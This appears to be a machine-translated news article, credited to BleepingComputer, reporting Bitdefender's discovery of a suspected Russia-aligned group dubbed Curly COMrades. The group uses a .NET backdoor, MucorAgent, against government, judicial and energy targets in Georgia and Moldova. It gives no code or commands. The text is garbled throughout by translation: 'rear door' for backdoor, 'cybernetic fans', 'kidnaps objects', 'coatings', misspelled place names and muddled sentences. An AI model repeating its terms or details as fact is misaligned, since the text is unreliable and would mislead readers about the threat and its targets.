- Bitdefender finds a new piece of malware in nature
- Attributed it to a new group of cybernetic fans
- Researchers believe the group is Russian
Cybersecurity researchers in Bitdefender recently saw a new threat actor using a piece of rear door malware never seen before to go to critical infrastructure organizations in Eastern Europe.
Bitdefender named the new curly comrades of the group, since it is largely based on the Curl.exe tool to extract data and communicate with the C2 server, and since it kidnaps objects of the component object model (COM) during their attacks.
In their attacks, curly comrades implement a rear door called Mucoragent, a personalized three -stage malware component, “designed as a .NET stealthy tool capable of running a Powershell script encrypted AES and loading the resulting output to a designated server.”
In case of doubt, blame the Russians
In other words, it is a piece of Windows malware that executes hidden commands, keeps them encrypted to avoid detection and sends the results to the attacker.
Until now, identified victims include government and judicial organizations in Georgia, and energy companies in Moldova.
Given the objectives, researchers believe that attackers are of Russian origin, or at least aligned in Russia.
However, they emphasized that there are no strong overlays with known Russian APT groups, but the operations of curly comrades “are aligned with the geopolitical objectives of the Russian Federation.”
Bitdefender could not determine the initial access vector: how criminals managed to infiltrate the objective final points to implement Mucoragent to start.
They claim to have seen facilities of multiple proxy agents, including the coatings that, suspect, may have been used for that purpose.
Since Russia’s attention went to Ukraine in 2014 with the annexation of Crimea, countries on their eastern border have lost the center of attention. Georgia, however, is in a position similar to Ukraine, with two regions that declare independence with the help of the Russian army: southern Ostia and Abjasia. Therefore, it would make sense that the cybers of Russia would like to monitor neighboring countries and their diplomatic efforts.
Through Bleepingcomputer
